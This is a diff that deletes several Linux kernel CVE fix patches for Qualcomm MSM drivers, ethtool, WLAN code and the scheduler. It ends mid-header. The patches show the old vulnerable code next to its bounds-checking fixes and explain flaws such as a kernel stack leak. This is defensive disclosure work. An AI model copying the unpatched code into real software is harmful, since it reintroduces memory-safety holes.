-From 80be0e249c906704085d13d4ae446f73913fc225 Mon Sep 17 00:00:00 2001
-From: Baruch Eruchimovitch
-Date: Mon, 14 Oct 2013 15:49:41 +0300
-Subject: msm: ultrasound: add verifications of some input parameters
-
-Some security vulnerabilities were found.
-To fix them, additional verifications of some input parameters
-are required.
-
-CRs-Fixed: 554575, 554560, 555030
-Change-Id: Ie87a433bcda89c3e462cfd511c168e8306056020
-Signed-off-by: Baruch Eruchimovitch
----
- arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c | 82 ++++++++++++++++++------------
- 1 file changed, 49 insertions(+), 33 deletions(-)
-
-diff --git a/arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c b/arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c
-index 1ea213a..01fcfd9 100644
---- a/arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c
-+++ b/arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c
-@@ -51,6 +51,11 @@
- #define Y_IND 1
- #define Z_IND 2
-
-+/* Shared memory limits */
-+/* max_buf_size = (port_size(65535*2) * port_num(8) * group_size(3) */
-+#define USF_MAX_BUF_SIZE 3145680
-+#define USF_MAX_BUF_NUM 32
-+
- /* Place for opreation result, received from QDSP6 */
- #define APR_RESULT_IND 1
-
-@@ -436,6 +441,15 @@ static int config_xx(struct usf_xx_type *usf_xx, struct us_xx_info_type *config)
- (config == NULL))
- return -EINVAL;
-
-+ if ((config->buf_size == 0) ||
-+ (config->buf_size > USF_MAX_BUF_SIZE) ||
-+ (config->buf_num == 0) ||
-+ (config->buf_num > USF_MAX_BUF_NUM)) {
-+ pr_err("%s: wrong params: buf_size=%d; buf_num=%d\n",
-+ __func__, config->buf_size, config->buf_num);
-+ return -EINVAL;
-+ }
-+
- data_map_size = sizeof(usf_xx->encdec_cfg.cfg_common.data_map);
- min_map_size = min(data_map_size, config->port_cnt);
-
-@@ -748,6 +762,7 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- {
- uint32_t timeout = 0;
- struct us_detect_info_type detect_info;
-+ struct usm_session_cmd_detect_info *p_allocated_memory = NULL;
- struct usm_session_cmd_detect_info usm_detect_info;
- struct usm_session_cmd_detect_info *p_usm_detect_info =
- &usm_detect_info;
-@@ -774,12 +789,13 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- uint8_t *p_data = NULL;
-
- detect_info_size += detect_info.params_data_size;
-- p_usm_detect_info = kzalloc(detect_info_size, GFP_KERNEL);
-- if (p_usm_detect_info == NULL) {
-+ p_allocated_memory = kzalloc(detect_info_size, GFP_KERNEL);
-+ if (p_allocated_memory == NULL) {
- pr_err("%s: detect_info[%d] allocation failed\n",
- __func__, detect_info_size);
- return -ENOMEM;
- }
-+ p_usm_detect_info = p_allocated_memory;
- p_data = (uint8_t *)p_usm_detect_info +
- sizeof(struct usm_session_cmd_detect_info);
-
-@@ -789,7 +805,7 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- if (rc) {
- pr_err("%s: copy params from user; rc=%d\n",
- __func__, rc);
-- kfree(p_usm_detect_info);
-+ kfree(p_allocated_memory);
- return -EFAULT;
- }
- p_usm_detect_info->algorithm_cfg_size =
-@@ -806,9 +822,7 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- p_usm_detect_info,
- detect_info_size);
- if (rc || (detect_info.detect_timeout == USF_NO_WAIT_TIMEOUT)) {
-- if (detect_info_size >
-- sizeof(struct usm_session_cmd_detect_info))
-- kfree(p_usm_detect_info);
-+ kfree(p_allocated_memory);
- return rc;
- }
-
-@@ -828,25 +842,24 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- USF_US_DETECT_UNDEF),
- timeout);
- /* In the case of timeout, "no US" is assumed */
-- if (rc < 0) {
-+ if (rc < 0)
- pr_err("%s: Getting US detection failed rc[%d]\n",
- __func__, rc);
-- return rc;
-- }
--
-- usf->usf_rx.us_detect_type = usf->usf_tx.us_detect_type;
-- detect_info.is_us = (usf_xx->us_detect_type == USF_US_DETECT_YES);
-- rc = copy_to_user((void __user *)arg,
-- &detect_info,
-- sizeof(detect_info));
-- if (rc) {
-- pr_err("%s: copy detect_info to user; rc=%d\n",
-- __func__, rc);
-- rc = -EFAULT;
-+ else {
-+ usf->usf_rx.us_detect_type = usf->usf_tx.us_detect_type;
-+ detect_info.is_us =
-+ (usf_xx->us_detect_type == USF_US_DETECT_YES);
-+ rc = copy_to_user((void __user *)arg,
-+ &detect_info,
-+ sizeof(detect_info));
-+ if (rc) {
-+ pr_err("%s: copy detect_info to user; rc=%d\n",
-+ __func__, rc);
-+ rc = -EFAULT;
-+ }
- }
-
-- if (detect_info_size > sizeof(struct usm_session_cmd_detect_info))
-- kfree(p_usm_detect_info);
-+ kfree(p_allocated_memory);
-
- return rc;
- } /* usf_set_us_detection */
-@@ -947,16 +960,14 @@ static int usf_set_rx_info(struct usf_type *usf, unsigned long arg)
- if (rc)
- return rc;
-
-- if (usf_xx->buffer_size && usf_xx->buffer_count) {
-- rc = q6usm_us_client_buf_alloc(
-- IN,
-- usf_xx->usc,
-- usf_xx->buffer_size,
-- usf_xx->buffer_count);
-- if (rc) {
-- (void)q6usm_cmd(usf_xx->usc, CMD_CLOSE);
-- return rc;
-- }
-+ rc = q6usm_us_client_buf_alloc(
-+ IN,
-+ usf_xx->usc,
-+ usf_xx->buffer_size,
-+ usf_xx->buffer_count);
-+ if (rc) {
-+ (void)q6usm_cmd(usf_xx->usc, CMD_CLOSE);
-+ return rc;
- }
-
- rc = q6usm_dec_cfg_blk(usf_xx->usc,
-@@ -1175,10 +1186,15 @@ static int usf_get_version(unsigned long arg)
- return -EFAULT;
- }
-
-- /* version_info.buf is pointer to place for the version string */
-+ if (version_info.buf_size < sizeof(DRV_VERSION)) {
-+ pr_err("%s: buf_size (%d) < version string size (%d)\n",
-+ __func__, version_info.buf_size, sizeof(DRV_VERSION));
-+ return -EINVAL;
-+ }
-+
- rc = copy_to_user(version_info.pbuf,
- DRV_VERSION,
-- version_info.buf_size);
-+ sizeof(DRV_VERSION));
- if (rc) {
- pr_err("%s: copy to version_info.pbuf; rc=%d\n",
- __func__, rc);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9899/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9899/ANY/0001.patch
deleted file mode 100644
index 1ef2d7bd..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9899/ANY/0001.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 8756624acb1e090b45baf07b2a8d0ebde114000e Mon Sep 17 00:00:00 2001
-From: Saket Saurabh
-Date: Mon, 30 Sep 2013 17:33:57 +0530
-Subject: ehci-msm2: Add boundary check in echi driver
-
-This change adds boundary check before copying data from userspace
-buffer to ehci local buffer.
-The third parameter passed to copy_from_user() should be minimum of the two
-values between userpsace buffer size count and (local_buffer size - 1). The
-last one byte in local_buffer should be reserved for null terminator.
-
-CRs-Fixed: 547910
-Change-Id: Id3c5432aa3fae3ce9759056b5481b9f516df7764
-Signed-off-by: Saket Saurabh
----
- drivers/usb/host/ehci-msm2.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/usb/host/ehci-msm2.c b/drivers/usb/host/ehci-msm2.c
-index 221af44..32ed806 100644
---- a/drivers/usb/host/ehci-msm2.c
-+++ b/drivers/usb/host/ehci-msm2.c
-@@ -1059,7 +1059,7 @@ static ssize_t debug_write_phy_data(struct file *file, const char __user *buf,
-
- memset(kbuf, 0, 10);
-
-- if (copy_from_user(kbuf, buf, count > 10 ? 10 : count))
-+ if (copy_from_user(kbuf, buf, min_t(size_t, sizeof(kbuf) - 1, count)))
- return -EFAULT;
-
- if (sscanf(kbuf, "%x", &data) != 1)
-@@ -1084,7 +1084,7 @@ static ssize_t debug_phy_write_addr(struct file *file, const char __user *buf,
-
- memset(kbuf, 0, 10);
-
-- if (copy_from_user(kbuf, buf, count > 10 ? 10 : count))
-+ if (copy_from_user(kbuf, buf, min_t(size_t, sizeof(kbuf) - 1, count)))
- return -EFAULT;
-
- if (sscanf(kbuf, "%x", &temp) != 1)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9900/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9900/ANY/0001.patch
deleted file mode 100644
index 8bc91005..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9900/ANY/0001.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 63c317dbee97983004dffdd9f742a20d17150071 Mon Sep 17 00:00:00 2001
-From: Avijit Kanti Das
-Date: Wed, 14 May 2014 11:03:56 -0700
-Subject: net: Zeroing the structure ethtool_wolinfo in ethtool_get_wol()
-
-memset() the structure ethtool_wolinfo that has padded bytes
-but the padded bytes have not been zeroed out.
-
-Change-Id: If3fd2d872a1b1ab9521d937b86a29fc468a8bbfe
-Signed-off-by: Avijit Kanti Das
----
- net/core/ethtool.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/net/core/ethtool.c b/net/core/ethtool.c
-index ce91766..900a05f 100644
---- a/net/core/ethtool.c
-+++ b/net/core/ethtool.c
-@@ -711,11 +711,13 @@ static int ethtool_reset(struct net_device *dev, char __user *useraddr)
-
- static int ethtool_get_wol(struct net_device *dev, char __user *useraddr)
- {
-- struct ethtool_wolinfo wol = { .cmd = ETHTOOL_GWOL };
-+ struct ethtool_wolinfo wol;
-
- if (!dev->ethtool_ops->get_wol)
- return -EOPNOTSUPP;
-
-+ memset(&wol, 0, sizeof(struct ethtool_wolinfo));
-+ wol.cmd = ETHTOOL_GWOL;
- dev->ethtool_ops->get_wol(dev, &wol);
-
- if (copy_to_user(useraddr, &wol, sizeof(wol)))
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9901/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9901/ANY/0001.patch
deleted file mode 100644
index 00ba32d7..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9901/ANY/0001.patch
+++ /dev/null
@@ -1,294 +0,0 @@ -From 637f0f7931dd7265ac1c250dc2884d6389c66bde Mon Sep 17 00:00:00 2001 -From: Panvar Vivek -Date: Thu, 12 Dec 2013 17:17:40 +0530 -Subject: wlan: Replace snprintf with scnprintf - -The function snprintf() do not write more than size bytes (including -the terminating null byte ('\0')). If the output was truncated due -to this limit then the return value is the number of characters -(excluding the terminating null byte) which would have been written -to the final string if enough space had been available. Thus, a -return value of size or more means that the output was truncated. - -Change-Id: Iccf9648961e2ac9eeffa0f824a80fd3798be3870 -CRs-Fixed: 548711 ---- - CORE/HDD/src/wlan_hdd_cfg.c | 2 +- - CORE/HDD/src/wlan_hdd_hostapd.c | 6 ++-- - CORE/HDD/src/wlan_hdd_scan.c | 2 +- - CORE/HDD/src/wlan_hdd_tdls.c | 9 +++--- - CORE/HDD/src/wlan_hdd_wext.c | 70 ++++++++++++++++++++++++++++++----------- - 5 files changed, 62 insertions(+), 27 deletions(-) - -diff --git a/CORE/HDD/src/wlan_hdd_cfg.c b/CORE/HDD/src/wlan_hdd_cfg.c -index 0fa44de..31d0adc 100644 ---- a/CORE/HDD/src/wlan_hdd_cfg.c -+++ b/CORE/HDD/src/wlan_hdd_cfg.c -@@ -3240,7 +3240,7 @@ VOS_STATUS hdd_cfg_get_config(hdd_context_t *pHddCtx, char *pBuf, int buflen) - { - snprintf(valueStr, CFG_VALUE_MAX_LEN, "(unhandled)"); - } -- curlen = snprintf(configStr, CFG_ENTRY_MAX_LEN, -+ curlen = scnprintf(configStr, CFG_ENTRY_MAX_LEN, - "%s=[%s]%s\n", - pRegEntry->RegName, - valueStr, -diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c -index cc2fb0e..d9c965a 100644 ---- a/CORE/HDD/src/wlan_hdd_hostapd.c -+++ b/CORE/HDD/src/wlan_hdd_hostapd.c -@@ -2350,7 +2350,7 @@ static iw_softap_ap_stats(struct net_device *dev, - - WLANSAP_GetStatistics((WLAN_HDD_GET_CTX(pHostapdAdapter))->pvosContext, &statBuffer, (v_BOOL_t)wrqu->data.flags); - -- len = snprintf(pstatbuf, len, -+ len = scnprintf(pstatbuf, len, - "RUF=%d RMF=%d RBF=%d " - "RUB=%d RMB=%d RBB=%d " - "TUF=%d TMF=%d TBF=%d " -@@ 
-3481,7 +3481,7 @@ VOS_STATUS hdd_softap_get_sta_info(hdd_adapter_t *pAdapter, v_U8_t *pBuf, int bu - int len = 0; - const char sta_info_header[] = "staId staAddress\n"; - -- len = snprintf(pBuf, buf_len, sta_info_header); -+ len = scnprintf(pBuf, buf_len, sta_info_header); - pBuf += len; - buf_len -= len; - -@@ -3489,7 +3489,7 @@ VOS_STATUS hdd_softap_get_sta_info(hdd_adapter_t *pAdapter, v_U8_t *pBuf, int bu - { - if(pAdapter->aStaInfo[i].isUsed) - { -- len = snprintf(pBuf, buf_len, "%*d .%02x:%02x:%02x:%02x:%02x:%02x\n", -+ len = scnprintf(pBuf, buf_len, "%*d .%02x:%02x:%02x:%02x:%02x:%02x\n", - strlen("staId"), - pAdapter->aStaInfo[i].ucSTAId, - pAdapter->aStaInfo[i].macAddrSTA.bytes[0], -diff --git a/CORE/HDD/src/wlan_hdd_scan.c b/CORE/HDD/src/wlan_hdd_scan.c -index 8c1d259..9c60557 100644 ---- a/CORE/HDD/src/wlan_hdd_scan.c -+++ b/CORE/HDD/src/wlan_hdd_scan.c -@@ -534,7 +534,7 @@ static eHalStatus hdd_IndicateScanResult(hdd_scan_info_t *scanInfo, tCsrScanResu - /* AGE */ - event.cmd = IWEVCUSTOM; - p = custom; -- p += snprintf(p, MAX_CUSTOM_LEN, " Age: %lu", -+ p += scnprintf(p, MAX_CUSTOM_LEN, " Age: %lu", - vos_timer_get_system_ticks() - descriptor->nReceivedTime); - event.u.data.length = p - custom; - current_event = iwe_stream_add_point (scanInfo->info,current_event, end, -diff --git a/CORE/HDD/src/wlan_hdd_tdls.c b/CORE/HDD/src/wlan_hdd_tdls.c -index 9a6149f..f616af2 100644 ---- a/CORE/HDD/src/wlan_hdd_tdls.c -+++ b/CORE/HDD/src/wlan_hdd_tdls.c -@@ -1400,11 +1400,12 @@ int wlan_hdd_tdls_get_all_peers(hdd_adapter_t *pAdapter, char *buf, int buflen) - - - init_len = buflen; -- len = snprintf(buf, buflen, "\n%-18s%-3s%-4s%-3s%-5s\n", "MAC", "Id", "cap", "up", "RSSI"); -+ len = scnprintf(buf, buflen, "\n%-18s%-3s%-4s%-3s%-5s\n", -+ "MAC", "Id", "cap", "up", "RSSI"); - buf += len; - buflen -= len; - /* 1234567890123456789012345678901234567 */ -- len = snprintf(buf, buflen, "---------------------------------\n"); -+ len = scnprintf(buf, buflen, 
"---------------------------------\n"); - buf += len; - buflen -= len; - -@@ -1417,7 +1418,7 @@ int wlan_hdd_tdls_get_all_peers(hdd_adapter_t *pAdapter, char *buf, int buflen) - pHddTdlsCtx = WLAN_HDD_GET_TDLS_CTX_PTR(pAdapter); - if (NULL == pHddTdlsCtx) { - mutex_unlock(&tdls_lock); -- len = snprintf(buf, buflen, "TDLS not enabled\n"); -+ len = scnprintf(buf, buflen, "TDLS not enabled\n"); - return len; - } - for (i = 0; i < 256; i++) { -@@ -1428,7 +1429,7 @@ int wlan_hdd_tdls_get_all_peers(hdd_adapter_t *pAdapter, char *buf, int buflen) - - if (buflen < 32+1) - break; -- len = snprintf(buf, buflen, -+ len = scnprintf(buf, buflen, - MAC_ADDRESS_STR"%3d%4s%3s%5d\n", - MAC_ADDR_ARRAY(curr_peer->peerMac), - curr_peer->staId, -diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c -index 0cd68bd..b141df0 100644 ---- a/CORE/HDD/src/wlan_hdd_wext.c -+++ b/CORE/HDD/src/wlan_hdd_wext.c -@@ -413,7 +413,7 @@ void hdd_wlan_get_version(hdd_adapter_t *pAdapter, union iwreq_data *wrqu, - pHWversion = "Unknown"; - } - -- wrqu->data.length = snprintf(extra, WE_MAX_STR_LEN, -+ wrqu->data.length = scnprintf(extra, WE_MAX_STR_LEN, - "Host SW:%s, FW:%s, HW:%s", - QWLAN_VERSIONSTR, - pSWversion, -@@ -2551,7 +2551,7 @@ static int iw_get_rssi(struct net_device *dev, - { - /* we are not connected or our SSID is too long - so we cannot report an rssi */ -- rc = snprintf(cmd, len, "OK"); -+ rc = scnprintf(cmd, len, "OK"); - } - else - { -@@ -2566,7 +2566,7 @@ static int iw_get_rssi(struct net_device *dev, - { - /* append the rssi to the ssid in the format required by - the WiFI Framework */ -- rc = snprintf(&cmd[ssidlen], len - ssidlen, " rssi %d", s7Rssi); -+ rc = scnprintf(&cmd[ssidlen], len - ssidlen, " rssi %d", s7Rssi); - } - else - { -@@ -4412,19 +4412,19 @@ static int iw_get_char_setnone(struct net_device *dev, struct iw_request_info *i - if ( WLAN_ADAPTER == adapter_num ) - { - useAdapter = pAdapter; -- buf = snprintf(extra + len, WE_MAX_STR_LEN - len, -+ buf = 
scnprintf(extra + len, WE_MAX_STR_LEN - len, - "\n\n wlan0 States:-"); - len += buf; - } - else if ( P2P_ADAPTER == adapter_num ) - { -- buf = snprintf(extra + len, WE_MAX_STR_LEN - len, -+ buf = scnprintf(extra + len, WE_MAX_STR_LEN - len, - "\n\n p2p0 States:-"); - len += buf; - - if( !pHddCtx ) - { -- buf = snprintf(extra + len, WE_MAX_STR_LEN - len, -+ buf = scnprintf(extra + len, WE_MAX_STR_LEN - len, - "\n pHddCtx is NULL"); - len += buf; - break; -@@ -4435,7 +4435,7 @@ static int iw_get_char_setnone(struct net_device *dev, struct iw_request_info *i - useAdapter = hdd_get_adapter(pHddCtx, WLAN_HDD_P2P_CLIENT); - if ( !useAdapter ) - { -- buf = snprintf(extra + len, WE_MAX_STR_LEN - len, -+ buf = scnprintf(extra + len, WE_MAX_STR_LEN - len, - "\n Device not configured as P2P_CLIENT."); - len += buf; - break; -@@ -4447,7 +4447,7 @@ static int iw_get_char_setnone(struct net_device *dev, struct iw_request_info *i - pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR( useAdapter ); - if( !pHddStaCtx ) - { -- buf = snprintf(extra + len, WE_MAX_STR_LEN - len, -+ buf = scnprintf(extra + len, WE_MAX_STR_LEN - len, - "\n pHddStaCtx is NULL"); - len += buf; - break; -@@ -4455,7 +4455,7 @@ static int iw_get_char_setnone(struct net_device *dev, struct iw_request_info *i - - tlState = smeGetTLSTAState(hHal, pHddStaCtx->conn_info.staId[0]); - -- buf = snprintf(extra + len, WE_MAX_STR_LEN - len, -+ buf = scnprintf(extra + len, WE_MAX_STR_LEN - len, - "\n HDD Conn State - %s " - "\n \n SME State:" - "\n Neighbour Roam State - %s" -@@ -4478,7 +4478,7 @@ static int iw_get_char_setnone(struct net_device *dev, struct iw_request_info *i - } - - /* Printing Lim State starting with global lim states */ -- buf = snprintf(extra + len, WE_MAX_STR_LEN - len, -+ buf = scnprintf(extra + len, WE_MAX_STR_LEN - len, - "\n \n LIM STATES:-" - "\n Global Sme State - %s "\ - "\n Global mlm State - %s "\ -@@ -4493,7 +4493,7 @@ static int iw_get_char_setnone(struct net_device *dev, struct iw_request_info *i 
- { - if ( pMac->lim.gpSession[count].valid ) - { -- buf = snprintf(extra + len, WE_MAX_STR_LEN - len, -+ buf = scnprintf(extra + len, WE_MAX_STR_LEN - len, - "\n Lim Valid Session %d:-" - "\n PE Sme State - %s " - "\n PE Mlm State - %s " -@@ -4574,6 +4574,7 @@ static int iw_get_char_setnone(struct net_device *dev, struct iw_request_info *i - VOS_STATUS status; - v_U8_t i, len; - char* buf ; -+ - tChannelListInfo channel_list; - - status = iw_softap_get_channel_list(dev, info, wrqu, (char *)&channel_list); -@@ -4585,20 +4586,23 @@ static int iw_get_char_setnone(struct net_device *dev, struct iw_request_info *i - buf = extra; - - /** -- * Maximum channels = WNI_CFG_VALID_CHANNEL_LIST_LEN. Maximum buffer -- * needed = 5 * number of channels. Check if sufficient buffer is available and -- * then proceed to fill the buffer. -- */ -+ * Maximum channels = WNI_CFG_VALID_CHANNEL_LIST_LEN. Maximum buffer -+ * needed = 5 * number of channels. Check if sufficient buffer is available and -+ * then proceed to fill the buffer. 
-+ */ - if(WE_MAX_STR_LEN < (5 * WNI_CFG_VALID_CHANNEL_LIST_LEN)) - { -- hddLog(VOS_TRACE_LEVEL_ERROR, "%s Insufficient Buffer to populate channel list\n",__func__); -+ hddLog(VOS_TRACE_LEVEL_ERROR, -+ "%s Insufficient Buffer to populate channel list\n", -+ __func__); - return -EINVAL; - } -- len = snprintf(buf, 5, "%u ", channel_list.num_channels); -+ len = scnprintf(buf, WE_MAX_STR_LEN, "%u ", -+ channel_list.num_channels); - buf += len; - for(i = 0 ; i < channel_list.num_channels; i++) - { -- len = snprintf(buf, 5, -+ len = scnprintf(buf, WE_MAX_STR_LEN, - "%u ", channel_list.channels[i]); - buf += len; - } -@@ -4632,6 +4636,36 @@ static int iw_get_char_setnone(struct net_device *dev, struct iw_request_info *i - break; - } - #endif -+#ifdef FEATURE_CESIUM_PROPRIETARY -+ case WE_GET_IBSS_STA_INFO: -+ { -+ hdd_station_ctx_t *pHddStaCtx = -+ WLAN_HDD_GET_STATION_CTX_PTR(pAdapter); -+ int idx = 0; -+ int length = 0; -+ -+ for (idx = 0; idx < HDD_MAX_NUM_IBSS_STA; idx++) -+ { -+ if (0 != pHddStaCtx->conn_info.staId[ idx ]) -+ { -+ length += scnprintf -+ ( -+ (extra + length), WE_MAX_STR_LEN - length, -+ "%d .%02x:%02x:%02x:%02x:%02x:%02x\n", -+ pHddStaCtx->conn_info.staId[ idx ], -+ pHddStaCtx->conn_info.peerMacAddress[idx].bytes[0], -+ pHddStaCtx->conn_info.peerMacAddress[idx].bytes[1], -+ pHddStaCtx->conn_info.peerMacAddress[idx].bytes[2], -+ pHddStaCtx->conn_info.peerMacAddress[idx].bytes[3], -+ pHddStaCtx->conn_info.peerMacAddress[idx].bytes[4], -+ pHddStaCtx->conn_info.peerMacAddress[idx].bytes[5] -+ ); -+ } -+ } -+ wrqu->data.length = strlen(extra)+1; -+ break; -+ } -+#endif - default: - { - hddLog(LOGE, "Invalid IOCTL command %d \n", sub_cmd ); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9902/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9902/ANY/0001.patch deleted file mode 100644 index c7b0144d..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9902/ANY/0001.patch +++ /dev/null 
@@ -1,61 +0,0 @@
-From 3b1c44a3a7129dc25abe2c23543f6f66c59e8f50 Mon Sep 17 00:00:00 2001
-From: Kiran Kumar Lokere
-Date: Thu, 7 Nov 2013 19:01:17 -0800
-Subject: Fix the buffer overflow issue observed in static code analysis.
-
-Fix the possible buffer overflow in IE parsing.
-
-Change-Id: I1a386ac09dbe30562fbd84739eb8d61c6a09b001
-CRs-Fixed: 553937, 553941
----
- CORE/MAC/src/include/dot11f.h | 2 +-
- CORE/SYS/legacy/src/utils/src/dot11f.c | 6 +++---
- 2 files changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/CORE/MAC/src/include/dot11f.h b/CORE/MAC/src/include/dot11f.h
-index 3a82e65..cc89258 100644
---- a/CORE/MAC/src/include/dot11f.h
-+++ b/CORE/MAC/src/include/dot11f.h
-@@ -52,7 +52,7 @@
- *
- *
- * This file was automatically generated by 'framesc'
-- * Tue Jul 2 15:39:44 2013 from the following file(s):
-+ * Thu Nov 7 16:38:38 2013 from the following file(s):
- *
- * dot11f.frms
- *
-diff --git a/CORE/SYS/legacy/src/utils/src/dot11f.c b/CORE/SYS/legacy/src/utils/src/dot11f.c
-index 411f593..1b89baa 100644
---- a/CORE/SYS/legacy/src/utils/src/dot11f.c
-+++ b/CORE/SYS/legacy/src/utils/src/dot11f.c
-@@ -29,7 +29,7 @@
- *
- *
- * This file was automatically generated by 'framesc'
-- * Tue Jul 2 15:39:44 2013 from the following file(s):
-+ * Thu Nov 7 16:38:38 2013 from the following file(s):
- *
- * dot11f.frms
- *
-@@ -2976,7 +2976,7 @@ tANI_U32 dot11fUnpackIeCountry(tpAniSirGlobal pCtx, tANI_U8 *pBuf, tANI_U8 ielen
- else
- {
- pDst->num_triplets = (tANI_U8)( ielen / 3 );
-- if (ielen / 3 > 84){
-+ if (ielen > 84 * 3){
- pDst->present = 0;
- return DOT11F_SKIPPED_BAD_IE;
- }
-@@ -4650,7 +4650,7 @@ tANI_U32 dot11fUnpackIeSuppChannels(tpAniSirGlobal pCtx, tANI_U8 *pBuf, tANI_U8
- if (pDst->present) status = DOT11F_DUPLICATE_IE;
- pDst->present = 1;
- pDst->num_bands = (tANI_U8)( ielen / 2 );
-- if (ielen / 2 > 48){
-+ if (ielen > 48 * 2){
- pDst->present = 0;
- return DOT11F_SKIPPED_BAD_IE;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9902/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-9902/ANY/0002.patch
deleted file mode 100644
index c7b0144d..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9902/ANY/0002.patch
+++ /dev/null
@@ -1,61 +0,0 @@
-From 3b1c44a3a7129dc25abe2c23543f6f66c59e8f50 Mon Sep 17 00:00:00 2001
-From: Kiran Kumar Lokere
-Date: Thu, 7 Nov 2013 19:01:17 -0800
-Subject: Fix the buffer overflow issue observed in static code analysis.
-
-Fix the possible buffer overflow in IE parsing.
-
-Change-Id: I1a386ac09dbe30562fbd84739eb8d61c6a09b001
-CRs-Fixed: 553937, 553941
----
- CORE/MAC/src/include/dot11f.h | 2 +-
- CORE/SYS/legacy/src/utils/src/dot11f.c | 6 +++---
- 2 files changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/CORE/MAC/src/include/dot11f.h b/CORE/MAC/src/include/dot11f.h
-index 3a82e65..cc89258 100644
---- a/CORE/MAC/src/include/dot11f.h
-+++ b/CORE/MAC/src/include/dot11f.h
-@@ -52,7 +52,7 @@
- *
- *
- * This file was automatically generated by 'framesc'
-- * Tue Jul 2 15:39:44 2013 from the following file(s):
-+ * Thu Nov 7 16:38:38 2013 from the following file(s):
- *
- * dot11f.frms
- *
-diff --git a/CORE/SYS/legacy/src/utils/src/dot11f.c b/CORE/SYS/legacy/src/utils/src/dot11f.c
-index 411f593..1b89baa 100644
---- a/CORE/SYS/legacy/src/utils/src/dot11f.c
-+++ b/CORE/SYS/legacy/src/utils/src/dot11f.c
-@@ -29,7 +29,7 @@
- *
- *
- * This file was automatically generated by 'framesc'
-- * Tue Jul 2 15:39:44 2013 from the following file(s):
-+ * Thu Nov 7 16:38:38 2013 from the following file(s):
- *
- * dot11f.frms
- *
-@@ -2976,7 +2976,7 @@ tANI_U32 dot11fUnpackIeCountry(tpAniSirGlobal pCtx, tANI_U8 *pBuf, tANI_U8 ielen
- else
- {
- pDst->num_triplets = (tANI_U8)( ielen / 3 );
-- if (ielen / 3 > 84){
-+ if (ielen > 84 * 3){
- pDst->present = 0;
- return DOT11F_SKIPPED_BAD_IE;
- }
-@@ -4650,7 +4650,7 @@ tANI_U32 dot11fUnpackIeSuppChannels(tpAniSirGlobal pCtx, tANI_U8 *pBuf, tANI_U8
- if (pDst->present) status = DOT11F_DUPLICATE_IE;
- pDst->present = 1;
- pDst->num_bands = (tANI_U8)( ielen / 2 );
-- if (ielen / 2 > 48){
-+ if (ielen > 48 * 2){
- pDst->present = 0;
- return DOT11F_SKIPPED_BAD_IE;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9903/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9903/ANY/0001.patch
deleted file mode 100644
index a5a47412..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9903/ANY/0001.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From 4efbc454ba68def5ef285b26ebfcfdb605b52755 Mon Sep 17 00:00:00 2001
-From: Vegard Nossum
-Date: Sun, 16 Feb 2014 22:24:17 +0100
-Subject: sched: Fix information leak in sys_sched_getattr()
-
-We're copying the on-stack structure to userspace, but forgot to give
-the right number of bytes to copy. This allows the calling process to
-obtain up to PAGE_SIZE bytes from the stack (and possibly adjacent
-kernel memory).
-
-This fix copies only as much as we actually have on the stack
-(attr->size defaults to the size of the struct) and leaves the rest of
-the userspace-provided buffer untouched.
-
-Found using kmemcheck + trinity.
-
-Fixes: d50dde5a10f30 ("sched: Add new scheduler syscalls to support an extended scheduling parameters ABI")
-Cc: Dario Faggioli
-Cc: Juri Lelli
-Cc: Ingo Molnar
-Signed-off-by: Vegard Nossum
-Signed-off-by: Peter Zijlstra
-Link: http://lkml.kernel.org/r/1392585857-10725-1-git-send-email-vegard.nossum@oracle.com
-Signed-off-by: Thomas Gleixner
----
- kernel/sched/core.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/kernel/sched/core.c b/kernel/sched/core.c
-index 33d030a..a6e7470 100644
---- a/kernel/sched/core.c
-+++ b/kernel/sched/core.c
-@@ -3786,7 +3786,7 @@ static int sched_read_attr(struct sched_attr __user *uattr,
- attr->size = usize;
- }
-
-- ret = copy_to_user(uattr, attr, usize);
-+ ret = copy_to_user(uattr, attr, attr->size);
- if (ret)
- return -EFAULT;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9904/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9904/ANY/0001.patch
deleted file mode 100644
index 4ad5569a..00000000
